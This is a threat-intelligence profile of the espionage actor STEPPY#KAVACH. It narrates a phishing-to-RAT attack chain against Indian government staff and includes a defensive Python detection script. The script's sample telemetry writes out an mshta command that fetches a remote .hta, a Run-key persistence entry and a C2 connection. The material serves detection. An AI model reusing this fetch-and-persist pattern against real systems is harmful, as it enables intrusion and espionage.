Cyber Threat Actor: STEPPY#KAVACH
| Actor Type | Location | Known Incidents |
|---|---|---|
| Spy | Pakistan | 0 incidents |
Profile
The threat actor tracked as STEPPY#KAVACH is believed to operate from Pakistan. Public reporting links the group to the SideCopy/APT36/Transparent Tribe cluster of activity, which researchers have previously attributed to Pakistani origins. STEPPY#KAVACH has been observed conducting focused intrusions against Indian government employees, with the primary targets appearing to be officials and agencies within the Indian state sector. The actor’s effort to locate the Kavach MFA database file indicates a specific interest in the target’s authentication infrastructure.
Initial access typically begins with a spear‑phishing email that carries a compressed archive containing a malicious shortcut (.LNK) file disguised as an image. When the shortcut is opened it invokes mshta.exe to retrieve a remote HTML application (.hta) hosted on a compromised Indian‑government‑themed website. The .hta file launches a series of obfuscated JScript files that download a lure PNG, create directories, establish persistence via a Run‑key registry entry, and finally download and execute a C#‑based remote access trojan named mm1.exe. The mm1.exe RAT, built in December 2022, searches for the kavach.db file, communicates with a hard‑coded C2 IP address (155.133.23.244) located in Germany, and uses Triple‑DES in ECB mode to encrypt its command‑and‑control traffic. The malware also supports additional capabilities such as executing arbitrary VBS scripts, taking screenshots, and exfiltrating files, reflecting a tooling style that relies on legitimate Windows utilities and minimal obfuscation. The campaign described in the Securonix research from December 2022 is representative of the actor’s operations, showing continued use of this TTP set against Indian governmental targets over the preceding year.
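The execution chain above leaves three observable points for a defender: mshta.exe fetching a remote .hta, a Run‑key value pointing into a user‑writable directory, and an outbound connection to the reported C2 address. The following detection logic is an added example, not part of the Securonix report or this profile; the event records are constructed, Sysmon‑style samples (event 1 = process create, 13 = registry value set, 3 = network connect) and the hostname is a reserved example domain.

```python
import re

# Constructed sample telemetry (not real data), modelled on Sysmon-style records.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "mshta.exe https://compromised-site.example/img/lure.hta"},
    {"id": 1, "image": r"C:\Windows\System32\mshta.exe",          # benign: local .hta
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"mshta.exe C:\Tools\local_admin_console.hta"},
    {"id": 13, "image": r"C:\Windows\System32\wscript.exe",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "value": r"C:\Users\alice\AppData\Roaming\Updater\mm1.exe"},
    {"id": 3, "image": r"C:\Users\alice\AppData\Roaming\Updater\mm1.exe",
     "dest_ip": "155.133.23.244", "dest_port": 443},
]

REMOTE_HTA = re.compile(r"https?://\S+\.hta\b", re.IGNORECASE)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\\", re.IGNORECASE)
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Public)\\", re.IGNORECASE)
KNOWN_C2 = {"155.133.23.244"}  # hard-coded C2 address reported for mm1.exe

def rule_remote_hta(ev):
    """mshta.exe launched with a remote .hta URL (the LNK -> mshta stage)."""
    return (ev["id"] == 1 and ev["image"].lower().endswith("\\mshta.exe")
            and REMOTE_HTA.search(ev.get("cmdline", "")) is not None)

def rule_run_key_to_user_path(ev):
    """Run-key persistence whose value points into a user-writable directory."""
    return (ev["id"] == 13 and RUN_KEY.search(ev.get("key", "")) is not None
            and USER_WRITABLE.search(ev.get("value", "")) is not None)

def rule_known_c2(ev):
    """Outbound connection to the C2 address named in the report."""
    return ev["id"] == 3 and ev.get("dest_ip") in KNOWN_C2

def detect(events):
    """Return (rule_name, event_index) for every event that a rule matches."""
    rules = [rule_remote_hta, rule_run_key_to_user_path, rule_known_c2]
    return [(r.__name__, i) for i, ev in enumerate(events) for r in rules if r(ev)]

if __name__ == "__main__":
    for name, idx in detect(SAMPLE_EVENTS):
        print(f"{name}: {SAMPLE_EVENTS[idx]}")
```

The local .hta launch is deliberately left unflagged to show that the rule keys on the remote retrieval, not on mshta.exe alone.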
